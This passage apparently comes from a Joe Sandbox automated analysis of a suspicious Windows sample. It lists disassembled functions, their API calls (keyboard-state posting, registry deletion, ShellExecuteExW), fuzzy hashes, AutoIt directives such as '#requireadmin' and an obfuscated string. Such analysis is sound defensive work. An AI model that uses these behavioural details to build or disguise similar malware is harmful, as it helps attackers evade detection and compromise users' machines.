                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                            • String ID:
                                            • API String ID: 3480843537-0
                                            • Opcode ID: bbf9f56305d4906f7d20f861ce2747b0423acb3a7a9ad5c958e83e6aebbc3263
                                            • Instruction ID: 5cd0fb0493cd6d3f0334b1f1c1e64fafc94b80437660c7fa62f1eda8811632f3
                                            • Opcode Fuzzy Hash: bbf9f56305d4906f7d20f861ce2747b0423acb3a7a9ad5c958e83e6aebbc3263
                                            • Instruction Fuzzy Hash: D3819D71504204ABC714EF68CC95E6BB7E8FF99714F104A29F995DB2D1EB30E908CB92
                                            Function 0082A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __mtinitlocknum.LIBCMT ref: 0082A991
                                              • Part of subcall function 00827D7C: __FF_MSGBANNER.LIBCMT ref: 00827D91
                                              • Part of subcall function 00827D7C: __NMSG_WRITE.LIBCMT ref: 00827D98
                                              • Part of subcall function 00827D7C: __malloc_crt.LIBCMT ref: 00827DB8
                                            • __lock.LIBCMT ref: 0082A9A4
                                            • __lock.LIBCMT ref: 0082A9F0
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,008B6DE0,00000018,00835E7B,?,00000000,00000109), ref: 0082AA0C
                                            • EnterCriticalSection.KERNEL32(8000000C,008B6DE0,00000018,00835E7B,?,00000000,00000109), ref: 0082AA29
                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 0082AA39
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1422805418-0
                                            • Opcode ID: 2aea7db9df667bd11e2a82365690652d05e669e0c90241bbe26f472e63a4fec0
                                            • Instruction ID: ac56d4285094cfbb4c40c46fb6fe61c7475d49064dd8e49f69f68e797c18e84d
                                            • Opcode Fuzzy Hash: 2aea7db9df667bd11e2a82365690652d05e669e0c90241bbe26f472e63a4fec0
                                            • Instruction Fuzzy Hash: E04117719002359BEB189FACEA4575CBBB0FF01335F248219E42AEB2D1D77499D4CB92
                                            Function 00868ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 00868EE4
                                            • GetDC.USER32(00000000), ref: 00868EEC
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00868EF7
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00868F03
                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00868F3F
                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00868F50
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0086BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00868F8A
                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00868FAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                            • String ID:
                                            • API String ID: 3864802216-0
                                            • Opcode ID: b3222388f022b84f41e78feb542370b11a5cb75ccf523ea99a8045d8d58dbe08
                                            • Instruction ID: 293b4c946beea92159ffa6a16c3528fbf25434bc658d0f874eb6961a3771e801
                                            • Opcode Fuzzy Hash: b3222388f022b84f41e78feb542370b11a5cb75ccf523ea99a8045d8d58dbe08
                                            • Instruction Fuzzy Hash: 47316B72200614BFEF108F54CC8AFEA3BAAFF49765F054165FE08DA191DAB59841CBB0
                                            Function 008516DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • _wcstok.LIBCMT ref: 0085184E
                                            • _wcscpy.LIBCMT ref: 008518DD
                                            • _memset.LIBCMT ref: 00851910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                            • String ID: X
                                            • API String ID: 774024439-3081909835
                                            • Opcode ID: ff0248caf498131e9f5709fcc1ef849ff581cf02831e464cbffd1526b026660b
                                            • Instruction ID: 320855d083a0c2cd4f7ac67e30671ca4f77b98b0433dbed34354cdc631ebaaa5
                                            • Opcode Fuzzy Hash: ff0248caf498131e9f5709fcc1ef849ff581cf02831e464cbffd1526b026660b
                                            • Instruction Fuzzy Hash: 6BC17C705043509FC764EF68C895AAAB7E4FF85354F00492DF98AD72A2DB30ED48CB82
                                            Function 00870133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • GetSystemMetrics.USER32(0000000F), ref: 0087016D
                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0087038D
                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008703AB
                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008703D6
                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008703FF
                                            • ShowWindow.USER32(00000003,00000000), ref: 00870421
                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00870440
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                            • String ID:
                                            • API String ID: 3356174886-0
                                            • Opcode ID: a0ec3509b0682489638ee17b9995dc9b61b923ec3e2e77609b82d6e4ebff3124
                                            • Instruction ID: 1533dfddb43d1e8b7c7607860ceba8cf9dea6515ad89c2e08008f3aeceae9dbb
                                            • Opcode Fuzzy Hash: a0ec3509b0682489638ee17b9995dc9b61b923ec3e2e77609b82d6e4ebff3124
                                            • Instruction Fuzzy Hash: C6A17C3560061AEBDB18CF68C989BADBBB1FB08705F14C115E858EB299D774ED60CF90
                                            Function 0081AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97bbcb31a5e2a39e68bcf2a9e5f3cc84cb737683aa46e8f793d458d2004bb20a
                                            • Instruction ID: 60fb5987a6badd5e28cb16e1aaea3e86144fc980f596d0339191237f6c290b1c
                                            • Opcode Fuzzy Hash: 97bbcb31a5e2a39e68bcf2a9e5f3cc84cb737683aa46e8f793d458d2004bb20a
                                            • Instruction Fuzzy Hash: 89714C71901509EFCB18CF98CC89AEEBB79FF89314F148159F915EA251C7309A42CB61
                                            Function 00862230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0086225A
                                            • _memset.LIBCMT ref: 00862323
                                            • ShellExecuteExW.SHELL32(?), ref: 00862368
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • CloseHandle.KERNEL32(00000000), ref: 0086242F
                                            • FreeLibrary.KERNEL32(00000000), ref: 0086243E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                            • String ID: @
                                            • API String ID: 4082843840-2766056989
                                            • Opcode ID: 1d548d2cc6457c8f27bd11cc692f527de84eb0124716eee2f582d7336e81cf1c
                                            • Instruction ID: 6b6a54610fbed4670b95b3d0e0aaf92cab5bdb6f33f10f2cb11b17565b6b0d29
                                            • Opcode Fuzzy Hash: 1d548d2cc6457c8f27bd11cc692f527de84eb0124716eee2f582d7336e81cf1c
                                            • Instruction Fuzzy Hash: 6F716D74A006199FCF04EFA8C99199EBBF5FF48310F118499E855EB3A1DB34AD40CB95
                                            Function 00843DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(?), ref: 00843DE7
                                            • GetKeyboardState.USER32(?), ref: 00843DFC
                                            • SetKeyboardState.USER32(?), ref: 00843E5D
                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00843E8B
                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00843EAA
                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00843EF0
                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00843F13
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: c081556fb5e779b9dac36bc659c9598435485531a762df207a5037508e23d5e7
                                            • Instruction ID: c727ef9a1fd528c2d52929e58e06d4fa8da0b299ef2ecdce99fb7676cf1793aa
                                            • Opcode Fuzzy Hash: c081556fb5e779b9dac36bc659c9598435485531a762df207a5037508e23d5e7
                                            • Instruction Fuzzy Hash: CC51A2A0A047D93DFB3647288C45BB67FA9BB06304F084589E0D5D68C3D799AEC8D761
                                            Function 00843BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(00000000), ref: 00843C02
                                            • GetKeyboardState.USER32(?), ref: 00843C17
                                            • SetKeyboardState.USER32(?), ref: 00843C78
                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00843CA4
                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00843CC1
                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00843D05
                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00843D26
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: dace2fdb0b82a20fbe1d3b0c9f910a2279a7ff0f51209b106fbeed24e3d17a76
                                            • Instruction ID: 4adfe5cb60aec7aa349369c109b7f3a1636a157a364ddc7d99f6044f35633983
                                            • Opcode Fuzzy Hash: dace2fdb0b82a20fbe1d3b0c9f910a2279a7ff0f51209b106fbeed24e3d17a76
                                            • Instruction Fuzzy Hash: 7451D6A09047D93DFB3687288C55B76BFA9FF06304F088489E0D5D64C2D694EE94D751
                                            Function 00847DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcsncpy$LocalTime
                                            • String ID:
                                            • API String ID: 2945705084-0
                                            • Opcode ID: a51aaca0ef7e8fb1f95c2eb63a86cce8bb03558ed074bf82fa50d88eac852ab0
                                            • Instruction ID: 43fd45059e4847c5dfd9f86831a17c26bea95ffbff2c86528323a54c2c5d48b2
                                            • Opcode Fuzzy Hash: a51aaca0ef7e8fb1f95c2eb63a86cce8bb03558ed074bf82fa50d88eac852ab0
                                            • Instruction Fuzzy Hash: 50415166C1022876DB10EBF8DC4A9CF73ACFF14310F5089A6E504E3122EB34E65487A6
                                            Function 0081B63C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCursorPos.USER32(000000FF), ref: 0081B64F
                                            • ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                            • GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                            • GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            Strings
                                            • aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 0087DFDC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AsyncState$ClientCursorScreen
                                            • String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 4210589936-3175721085
                                            • Opcode ID: 97603c986ffcfeece680e3f6e10618af7fdede47e425ec2c4ec12bd9989e26f9
                                            • Instruction ID: 7b5b07c504edd8f2e8ee9e11f1620113c00c6f7a939bf7c205a362a97311c8df
                                            • Opcode Fuzzy Hash: 97603c986ffcfeece680e3f6e10618af7fdede47e425ec2c4ec12bd9989e26f9
                                            • Instruction Fuzzy Hash: 15416071604219FBCF159F68C844AE9BB74FF15324F10831AF829D6290CB31AD94DF91
                                            Function 00863D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00863DA1
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00863DCB
                                            • FreeLibrary.KERNEL32(00000000), ref: 00863E80
                                              • Part of subcall function 00863D72: RegCloseKey.ADVAPI32(?), ref: 00863DE8
                                              • Part of subcall function 00863D72: FreeLibrary.KERNEL32(?), ref: 00863E3A
                                              • Part of subcall function 00863D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00863E5D
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00863E25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                            • String ID:
                                            • API String ID: 395352322-0
                                            • Opcode ID: 9efab34eca51210b48a0bb2fd273f12060ad9bd9cca1f13b3a1dfd862baa05b4
                                            • Instruction ID: fe730b78ebd57c68178251510c55124c4855992c210175cb11aaad013870f589
                                            • Opcode Fuzzy Hash: 9efab34eca51210b48a0bb2fd273f12060ad9bd9cca1f13b3a1dfd862baa05b4
                                            • Instruction Fuzzy Hash: 7C31F7B1911209BFDB159B94DC89AFFB7BCFF08300F10016AA612E2190D6719F899BB0
                                            Function 00868FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00868FE7
                                            • GetWindowLongW.USER32(00F3D948,000000F0), ref: 0086901A
                                            • GetWindowLongW.USER32(00F3D948,000000F0), ref: 0086904F
                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00869081
                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008690AB
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008690BC
                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008690D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID:
                                            • API String ID: 2178440468-0
                                            • Opcode ID: e6afb4ea7ab361b991422520c92cb522ac6356b6a10fd9689283cfff5af86d26
                                            • Instruction ID: 5862835b871ac111c26397828047067be3aeec766760c6753596e7087b426355
                                            • Opcode Fuzzy Hash: e6afb4ea7ab361b991422520c92cb522ac6356b6a10fd9689283cfff5af86d26
                                            • Instruction Fuzzy Hash: 13312274640219AFDB20CF58DC89F6437A9FB5A718F160264F559CB2F2CB71A840CB82
                                            Function 008408AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008408F2
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00840918
                                            • SysAllocString.OLEAUT32(00000000), ref: 0084091B
                                            • SysAllocString.OLEAUT32(?), ref: 00840939
                                            • SysFreeString.OLEAUT32(?), ref: 00840942
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00840967
                                            • SysAllocString.OLEAUT32(?), ref: 00840975
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: 36bb5af1b97ef5c2cba9694058ce7c622d0c20bf855f55bc99f84c718ebf79c9
                                            • Instruction ID: 29bedcc05e5b020d08204a6d27272f8dc2a8376ef72aeebd61fa72bcf20db26f
                                            • Opcode Fuzzy Hash: 36bb5af1b97ef5c2cba9694058ce7c622d0c20bf855f55bc99f84c718ebf79c9
                                            • Instruction Fuzzy Hash: 1021977660121DAFDB109F7CDC88DAB7BACFF09360B048525FA15DB192D670EC458B64
                                            Function 00842472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                            • API String ID: 1038674560-2734436370
                                            • Opcode ID: edcf4ef2d17b00aeb95336a979e1e288c1af35e3fda2d42ec5bced3271208e4d
                                            • Instruction ID: e9db857afe64a6a8b8200ad9e4901179d8837195ac247c01bb013acc416207b0
                                            • Opcode Fuzzy Hash: edcf4ef2d17b00aeb95336a979e1e288c1af35e3fda2d42ec5bced3271208e4d
                                            • Instruction Fuzzy Hash: 7C214C7124861977C730FA389C12FB77398FF65314FA54029F446E7182E6559D81C3AA
                                            Function 00840986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008409CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008409F1
                                            • SysAllocString.OLEAUT32(00000000), ref: 008409F4
                                            • SysAllocString.OLEAUT32 ref: 00840A15
                                            • SysFreeString.OLEAUT32 ref: 00840A1E
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00840A38
                                            • SysAllocString.OLEAUT32(?), ref: 00840A46
                                            Memory Dump Source
